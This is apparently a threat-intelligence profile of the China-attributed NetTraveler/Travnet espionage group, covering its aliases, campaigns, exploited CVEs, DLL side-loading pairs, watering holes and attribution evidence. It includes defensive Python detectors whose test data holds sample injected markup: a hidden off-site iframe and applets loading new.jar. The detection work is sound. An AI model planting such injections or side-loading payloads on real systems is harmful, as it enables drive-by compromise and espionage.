Threat Actor

NetTraveler / Travnet

nettraveler_travnet · china · active since 2004

NetTraveler / Travnet (canonical Kaspersky GReAT naming, taken from the internal malware string "NetTraveler is Running!" present in the earliest versions; disclosed June 4, 2013 by Costin Raiu at the 2013 Cybersecurity Forum, Washington, D.C.; also tracked as Travnet, Netfile and Red Star APT) is a People's Republic of China state-aligned cyber-espionage cluster whose earliest samples date to 2004-2005. With 22+ years of tracked activity it is one of the longest-running publicly tracked China-attributed clusters in industry analysis.

Per Kaspersky GReAT, the operators are a ~50-person, predominantly Chinese-speaking team with working English. Kaspersky counted ~350 confirmed victims (estimated ~1,000 in total across 40 countries, concentrated in Mongolia, India and Russia). Signature target categories: Tibetan and Uyghur activists (consistent with PRC suppression of diaspora activism), government agencies and embassies, oil industry companies, scientific research centres, universities, military contractors and foreign ISPs.

Tradecraft is unsophisticated but effective: spear-phishing with Microsoft Office documents exploiting publicly known vulnerabilities (CVE-2012-0158 and CVE-2010-3333, later CVE-2015-2545; no 0-day investment), delivering the custom NetTraveler Trojan and the Saker backdoor. Saker uses the DLL names JustTempFun and ServiceMain, which also appear in Gh0st RAT, pointing to the same developers. Other signatures: DLL side-loading, in which the legitimately signed fsguidll.exe / RasTls.exe load a malicious fslapi.dll / rastls.dll placed beside them; MNKit-built malicious Office documents; a custom BASE64-like encoding for exfiltration; domain registration concentrated at Shanghai Meicheng Technology (Beijing); look-alike domains hosting RAR-SFX droppers; and watering holes on compromised Uyghur/Tibetan websites (weststock[.]org and the Islamic Association of Eastern Turkistan site, where injected iframes delivered the Java applets new.jar and ie.jar exploiting CVE-2013-2465).

The cluster has operational links to the Gh0st RAT developers and to the mid-2000s Titan Rain operations, and shares victims with Red October without any evidence of coordination. Per Proofpoint, the same actor ran PlugX until a January 2016 pivot to NetTraveler. After the 2013 disclosure it rotated its infrastructure to China, Hong Kong and Taiwan rather than ceasing operations. In the curated corpus it fills the cell of the longest-running China-attributed APT.

Attribution: China (confidence: high) · 13 aliases
Sigma rules: 200 · YARA rules: 0 · Live IOCs: 0 · CVEs exploited: 4

Profile

NetTraveler / Travnet (canonical Kaspersky GReAT naming "NetTraveler", from the internal string "NetTraveler is Running!" found in the earliest malware versions; alternative names "Travnet", "Netfile" and "Red Star APT") is a People's Republic of China state-aligned cyber-espionage cluster whose earliest samples date to 2004-2005, giving 22+ years of tracked activity and making it one of the longest-running publicly tracked China-attributed clusters in industry analysis. Per Kaspersky GReAT's canonical disclosure (Securelist, June 4, 2013; presented by Costin Raiu at the 2013 Cybersecurity Forum, Washington, D.C.): "We estimate the group size to about 50 individuals, most of which speak Chinese natively and have working knowledge of the English language." The cluster has compromised ~350 confirmed victims (estimated ~1,000 in total across 40 countries, with the highest concentrations in Mongolia, India and Russia). Per Proofpoint, the same actor used PlugX until January 2016, when it pivoted to NetTraveler; this places it within the broader ecosystem of PlugX-using China-attributed clusters.

Operational phases:
  • (1) Earliest emergence (2004-2005). The "NetTraveler is Running!" string is present in the earliest samples. The tradecraft that later characterised the group (spear-phishing with malicious Office documents, the custom NetTraveler Trojan plus Saker backdoor, and broad intelligence collection) grew out of this tooling.
  • (2) Office-document exploitation era (2010-2013). Spear-phishing attachments exploiting two publicly known Microsoft Office vulnerabilities, CVE-2010-3333 and CVE-2012-0158. No 0-day investment; success came from patient social engineering plus known-CVE exploitation.
  • (3) Kaspersky canonical disclosure (June 4, 2013). Costin Raiu presented the findings at the 2013 Cybersecurity Forum, Washington, D.C.: 350+ confirmed victims, ~1,000 estimated across 40 countries, links to the Gh0st RAT developers (the JustTempFun and ServiceMain DLL names shared by Saker) and to the Titan Rain operations.
  • (4) Post-disclosure continuity (June 2013+). Rather than stopping, the operators "shutdown all known C2s and moved them to new servers in China, Hong Kong and Taiwan. However, they also continued the attacks unhindered."
  • (5) Java-exploit watering holes (September 2013+). The CVE-2013-2465 Java exploit was served from compromised Uyghur-related websites (weststock[.]org; the Islamic Association of Eastern Turkistan site, via iframe injection).
  • (6) Proofpoint Russia and Europe campaign (January 2016+). Same-actor pivot from PlugX to NetTraveler, with nuclear-energy, geopolitics and military lure themes and targeting expanded across Russia, Mongolia, Belarus and Europe.
  • (7) CVE-2015-2545 adoption (2016+). Continued exploit-tradecraft evolution.
  • (8) Continued operations (post-2016). Assessed to continue at reduced public visibility through 2026.
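The watering-hole pattern in phase (5), an iframe injected into a compromised community site that pulls in a Java applet from attacker infrastructure, is cheap to check for in a site's own HTML. The scanner below is an added example written for this page, not code from Kaspersky or from any cited report. It flags iframes that point off-site or are hidden/zero-sized, and any applet, embed, object or applet param that references a .jar. The sample page, the site host example-site.org and the staging address 203.0.113.10 are constructed; only the jar names new.jar and ie.jar come from the reporting above.

```python
"""Scan HTML for the watering-hole injection pattern described above:
hidden or off-site iframes and Java applet (.jar) references. Added example;
the sample HTML and hosts are constructed, not captured from real sites."""
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse


@dataclass
class Hit:
    tag: str            # element that triggered the finding
    ref: str            # src / archive / value that was referenced
    reasons: List[str]


def _is_hidden(attrs: Dict[str, str]) -> bool:
    """Injected iframes are typically zero-sized or styled away."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = attrs.get("width", "").strip() in ("0", "1") or \
        attrs.get("height", "").strip() in ("0", "1")
    return "display:none" in style or "visibility:hidden" in style or tiny


class InjectionScanner(HTMLParser):
    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.hits: List[Hit] = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            reasons = []
            host = urlparse(src).hostname
            if host and host.lower() != self.site_host:
                reasons.append("iframe points off-site")
            if _is_hidden(a):
                reasons.append("iframe hidden or zero-sized")
            if reasons:
                self.hits.append(Hit(tag, src, reasons))
        elif tag in ("applet", "embed", "object"):
            # <applet archive=...>, <embed src=...>, <object data=...>
            ref = a.get("archive") or a.get("src") or a.get("data") or ""
            if ref.lower().endswith(".jar"):
                self.hits.append(Hit(tag, ref, ["Java archive loaded by <%s>" % tag]))
        elif tag == "param":
            # Applets embedded via <object> pass the jar as <param name="archive">
            if a.get("name", "").lower() == "archive" and \
                    a.get("value", "").lower().endswith(".jar"):
                self.hits.append(Hit(tag, a["value"], ["Java archive passed via <param>"]))


def scan_html(html: str, site_host: str) -> List[Hit]:
    """Return every suspicious iframe/applet reference found in html."""
    p = InjectionScanner(site_host)
    p.feed(html)
    p.close()
    return p.hits


# Constructed sample: one legitimate same-site iframe, then an injection
# modelled on the description above (hidden off-site iframe plus .jar applets).
SAMPLE_HTML = """
<html><body>
<h1>Community news</h1>
<iframe src="https://example-site.org/calendar" width="400" height="300"></iframe>
<iframe src="http://203.0.113.10/ie.html" width="0" height="0" style="display:none"></iframe>
<applet code="Run.class" archive="http://203.0.113.10/new.jar" width="1" height="1"></applet>
<object classid="java:Run.class"><param name="archive" value="ie.jar"></object>
</body></html>
"""

if __name__ == "__main__":
    for h in scan_html(SAMPLE_HTML, "example-site.org"):
        print(h.tag, h.ref, "|", "; ".join(h.reasons))
```

Run it against a crawl of your own pages and treat any hit on a site that does not legitimately serve Java applets as an indicator of compromise; the same-site iframe in the sample is deliberately left unflagged to show the host check.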

Signature operational tradecraft
  • Tibetan/Uyghur activist targeting: sustained signature targeting category, consistent with PRC suppression of diaspora activism, including watering holes on Uyghur diaspora websites delivering Java applet payloads.
  • Office-document exploits: CVE-2012-0158, CVE-2010-3333 and CVE-2015-2545. No 0-day investment.
  • NetTraveler Trojan + Saker backdoor: signature malware platform. Saker's JustTempFun and ServiceMain DLL names also occur in Gh0st RAT, indicating lineage to the Gh0st RAT developers.
  • DLL side-loading via fsguidll.exe / RasTls.exe: the clean signed executables load the malicious fslapi.dll / rastls.dll placed beside them.
  • MNKit Office malicious document builder: builder artifacts recur across the malicious Word documents.
  • Custom BASE64-like protocol for exfiltration: signature C2 encoding pattern.
  • Shanghai Meicheng Technology (Beijing) registrar concentration: infrastructure attribution indicator.
  • Look-alike domains hosting RAR-SFX droppers: spear-phishing infrastructure pattern.
  • Watering holes on compromised Uyghur/Tibetan websites: drive-by infection tradecraft.
  • Country-specific lure adaptation: "Depending on the targeted country, the actor switches lures and decoys accordingly."
  • ~50-operator, Chinese-speaking team profile, per Kaspersky.
  • 40-country / ~1,000-victim documented scale: signature victim distribution. The cluster fills the historical longest-running China-attributed APT cell in this curated corpus and is distinct from the 33 China-attributed clusters already curated through (a) its earliest active period (since at least 2004, one of the longest on record); (b) signature Tibetan/Uyghur activist targeting alongside government/military targeting; (c) the Saker backdoor's Gh0st RAT DLL lineage; (d) the historical CVE-2012-0158 + CVE-2010-3333 exploitation pattern; (e) links to the Titan Rain operations and the Red October shared-victim pattern.
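The side-loading bullet above names two specific host/payload pairs, which makes it a good candidate for a log-based check rather than a hash-based one. The detector below is an added example written for this page, not code from the page or from any cited vendor. It walks Sysmon Event ID 7 (Image loaded) records, matches the fsguidll.exe -> fslapi.dll and RasTls.exe -> rastls.dll pairs, and raises a finding only when the payload DLL is unsigned or the signed host binary is running from a user-writable location, so the vendor's own install does not fire. The field names Image, ImageLoaded, Signed and SignatureStatus are Sysmon's; the sample events, the vendor install path and the list of user-writable directory markers are constructed assumptions.

```python
"""Flag the NetTraveler DLL side-loading pairs in Sysmon Event ID 7 records.
Added example; field names follow the Sysmon schema, sample events and the
user-writable directory list are constructed assumptions."""
from __future__ import annotations
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Clean signed host -> malicious payload it is tricked into loading (from the reporting).
SIDELOAD_PAIRS = {
    "fsguidll.exe": "fslapi.dll",
    "rastls.exe": "rastls.dll",
}

# Assumption: a vendor-signed binary running from one of these is itself suspect.
USER_WRITABLE_MARKERS = ("\\temp\\", "\\appdata\\", "\\programdata\\",
                         "\\downloads\\", "\\users\\public\\")


@dataclass(frozen=True)
class Finding:
    image: str
    dll: str
    reasons: Tuple[str, ...]


def _win(p: str) -> str:
    """Normalise a Windows path for case-insensitive comparison."""
    return p.replace("/", "\\").lower()


def analyse_event(ev: Dict[str, str]) -> Optional[Finding]:
    image, loaded = _win(ev.get("Image", "")), _win(ev.get("ImageLoaded", ""))
    if SIDELOAD_PAIRS.get(ntpath.basename(image)) != ntpath.basename(loaded):
        return None                      # not one of the known pairs
    reasons: List[str] = []
    # Sysmon's Signed/SignatureStatus describe the loaded DLL, not the host exe.
    if ev.get("Signed", "").lower() != "true" or \
            ev.get("SignatureStatus", "").lower() != "valid":
        reasons.append("payload DLL unsigned or signature invalid")
    host_dir = ntpath.dirname(image) + "\\"
    if any(m in host_dir for m in USER_WRITABLE_MARKERS):
        reasons.append("host exe running from user-writable directory")
    if not reasons:
        return None                      # looks like the vendor's own install
    # Search-order abuse needs the DLL beside the exe; record it as supporting evidence.
    if ntpath.dirname(image) == ntpath.dirname(loaded):
        reasons.append("DLL co-located with host exe")
    return Finding(image, loaded, tuple(reasons))


def scan(events: List[Dict[str, str]]) -> List[Finding]:
    """Return one Finding per event that matches a side-loading pair suspiciously."""
    return [f for f in (analyse_event(e) for e in events) if f is not None]


# Constructed Sysmon EID 7 records: a benign vendor load, an unrelated load,
# and a side-load staged in the user's temp directory.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Vendor\fsguidll.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\fslapi.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\shell32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\fsguidll.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\fslapi.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.image, "->", f.dll, "|", "; ".join(f.reasons))
```

The two-condition gate is the point: matching the file-name pair alone would page on every legitimate install of the vendor software, while requiring an unsigned payload alone would miss a signed-but-foreign DLL dropped into a temp directory. Extend SIDELOAD_PAIRS as new host binaries are reported.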

Aliases

13 aliases: nettraveler, nettraveler is running, net_traveler, travnet, netfile, trojan-spy.win32.travnet, downloader.win32.nettraveler, red star apt, red_star_apt, in pursuit of optical fibers and troop intel, nettraveler_apt, travnet_apt, nettraveler_travnet

Notable Campaigns

9 campaigns:
  • 2016-Present: Continued Operations Post-2016 (Limited Public Visibility)
  • 2016: Proofpoint Russia + European Campaign (January 2016+)
  • 2016: CVE-2015-2545 Office RCE Exploitation Era (2016+)
  • 2013: Kaspersky GReAT Canonical NetTraveler Disclosure (June 4, 2013)
  • 2013: Post-Disclosure Operational Continuity (June 2013+)
  • 2013: Java Exploit CVE-2013-2465 Watering Hole Adoption (September 2013+)
  • 2010-2013: CVE-2010-3333 + CVE-2012-0158 Exploit Era (2010-2013)
  • 2004-Present: Tibetan / Uyghur Activist Signature Targeting
  • 2004: NetTraveler Earliest Operational Emergence (2004-2005)

Attribution & Reporting

Attributed by
Kaspersky GReAT; Proofpoint; Symantec / Broadcom Threat Hunter Team; Trend Micro; SecurityWeek; Threatpost; Mandiant; Microsoft Threat Intelligence Center; CrowdStrike; Sophos X-Ops; SentinelOne / SentinelLabs; Costin Raiu (Kaspersky GReAT Director, presented at the 2013 Cybersecurity Forum); Cisco Talos; Citizen Lab (University of Toronto, for adjacent Tibetan/Uyghur targeting tracking)
Key reporting
  • Kaspersky GReAT (Costin Raiu, presented at the 2013 Cybersecurity Forum, Washington, D.C.): "NetTraveler is Running!": Red Star APT Attacks Compromise High-Profile Victims (Securelist, June 4, 2013), canonical comprehensive NetTraveler disclosure
  • Kaspersky GReAT: NetTraveler is Back: The 'Red Star' APT Returns With New Tricks (Securelist, September 2013), Java exploit adoption follow-up
  • Proofpoint: NetTraveler APT Targets Russian and European Interests (July 2016), PlugX-to-NetTraveler operational pivot disclosure
  • Proofpoint: In Pursuit of Optical Fibers and Troop Intel (earlier disclosure tracking the same actor in its pre-NetTraveler, PlugX era)
  • Symantec / Broadcom Threat Hunter Team: NetTraveler / Travnet operational analysis
  • Threatpost: NetTraveler Espionage Campaign Uncovered, Links to Gh0st RAT and Titan Rain (June 2013)
  • SecurityWeek: Decade-old NetTraveler Malware Used in Multi-National Attacks (July 2016)
  • Cyber Defense Magazine: NetTraveler APT Still Targets European and Russian Interests (2016)
  • Infosecurity Magazine: NetTraveler spyware compromised 1,000 political and industrial targets
  • ESET / WeLiveSecurity: NetTraveler cyber-espionage Tibet/Uyghur tracking (June 2013)
  • Citizen Lab (University of Toronto): NetTraveler Tibet/Uyghur targeting analysis (June 2013)
  • Trend Micro: NetTraveler adjacent cluster tracking
  • Microsoft Threat Intelligence: NetTraveler operational context
  • CrowdStrike Global Threat Report: China-aligned historical cluster tracking
  • Mandiant: NetTraveler / Red Star APT operational analysis
  • Sophos X-Ops: China-aligned cluster tracking (historical era)
  • SentinelLabs: NetTraveler operational analysis
  • Cisco Talos: NetTraveler adjacent tracking
  • MITRE ATT&CK Software S0033, NetTraveler
  • Malpedia actor profile: NetTraveler / Travnet

Operational

State sponsor

People's Republic of China state-aligned cluster. China attribution is well established per Kaspersky GReAT's canonical disclosure of June 4, 2013 (presented by Costin Raiu at the 2013 Cybersecurity Forum in Washington, D.C.). Per Kaspersky's sinkhole and malware analysis: "We estimate the group size to about 50 individuals, most of which speak Chinese natively and have working knowledge of the English language." The attribution rests on several convergent evidence streams:

(a) Operator language profile: a ~50-person team, mostly native Chinese speakers with working English, per Kaspersky. The bilingual profile is consistent with a state-aligned Chinese cluster operating against foreign targets.

(b) Beijing registrar concentration: per Proofpoint's analysis of the 2016 campaigns, "The actor set up its domains with the same registrar in Beijing, referred to as 'Shanghai Meicheng Technology Information Development Co., Ltd.,' but provided randomized information at registration (except for email addresses)."

(c) Shared lineage with other China-attributed tooling: per Kaspersky, "one backdoor used in the NetTraveler campaign was probably written by the same developers responsible for Gh0st RAT." The Saker backdoor module, which NetTraveler uses to steal system information, uses two DLLs named JustTempFun and ServiceMain, and both names also occur in Gh0st RAT. NetTraveler infrastructure also overlaps in IP range with Zegost / Gh0st RAT operations, and Kaspersky linked the cluster to the mid-2000s Titan Rain operations.

(d) Shared victims with Red October: per Kaspersky, "some of the victims targeted by NetTraveler are also victims of Red October. However, Kaspersky has not connected the attackers in these two campaigns." Red October, whose developers Kaspersky assessed to be Russian-speaking, and NetTraveler appear to have independently targeted the same high-value entities (a Russian military contractor, a Tajikistan government entity, and embassy staff in Iran, Belgium, Kazakhstan and Belarus) rather than coordinated.

(e) Target selection consistent with PRC strategic interests: Tibetan and Uyghur activists (sustained targeting consistent with PRC suppression of diaspora activism), the oil and gas industry (PRC energy security), scientific research centres (strategic technology acquisition), universities, governments and governmental institutions (diplomatic intelligence), embassies and military contractors (strategic intelligence). The highest infection concentrations, in Mongolia, India and Russia, match PRC regional priorities.

(f) DLL side-loading tradecraft: per SecurityWeek and Proofpoint, "The NetTraveler Trojan uses a DLL side-loading technique (a clean signed executable fsguidll.exe or RasTls.exe is used to sideload fslapi.dll or rastls.dll, respectively)." Side-loading signed third-party binaries is a long-standing pattern across China-attributed clusters.

(g) Same-actor PlugX-to-NetTraveler pivot: per Proofpoint, "this group utilized PlugX malware to target various telecommunication and military interests in Russia. Since January 2016, this group switched to using NetTraveler and varied its targets, but otherwise left most of its tools, techniques, and procedures (TTPs) unchanged." This places NetTraveler in the broader ecosystem of PlugX-using China-attributed clusters (PlugX historically being the most widely used modular RAT among them).

No formal PRC government attribution has been publicly issued. The attribution stands at the "China-attributed" / "China-based actor" level assessed by industry analysts (Kaspersky GReAT, Proofpoint, Symantec, SecurityWeek and others).

Operational significance: NetTraveler is one of the longest-running publicly tracked China-attributed clusters, with earliest sample compilation dates from approximately 2004-2005 and publicly reported operations through at least 2016, roughly 12 years of documented activity with continued operations assessed since. In the curated corpus it serves as a historical precursor and lineage anchor for the broader Chinese state-aligned cyber-espionage ecosystem.

Motivations
China state-aligned intelligence collection; Tibetan/Uyghur diaspora activist surveillance; PRC diplomatic intelligence collection; strategic industry intelligence collection; military contractor intelligence collection; scientific research and strategic technology acquisition; PRC regional strategic interest intelligence; oil and gas industry intelligence collection

Detection Blind Spots

60 mapped techniques. Share of this actor's techniques covered by each detection layer; low values are where you would be blind if this actor targeted you.
  • Behavioral / log (Sigma): 58/60 (96%)
  • Analytics (MITRE CAR): 28/60 (46%)
  • Runtime / container (Falco): 8/60 (13%)
  • File / malware (YARA): 0/60 (0%)
  • Network (Suricata/Snort): 15/60 (25%)
  • Vuln scan (Nuclei): 0/60 (0%)

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor's mapped techniques, to validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use.

Tools Used

0 ATT&CK-mapped tools.
Other tooling / TTPs (curation, not ATT&CK-mapped): MNKit Office exploit builder; Saker JustTempFun DLL; Saker ServiceMain DLL; Saker backdoor; Shanghai Meicheng Technology (Beijing) registrar
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin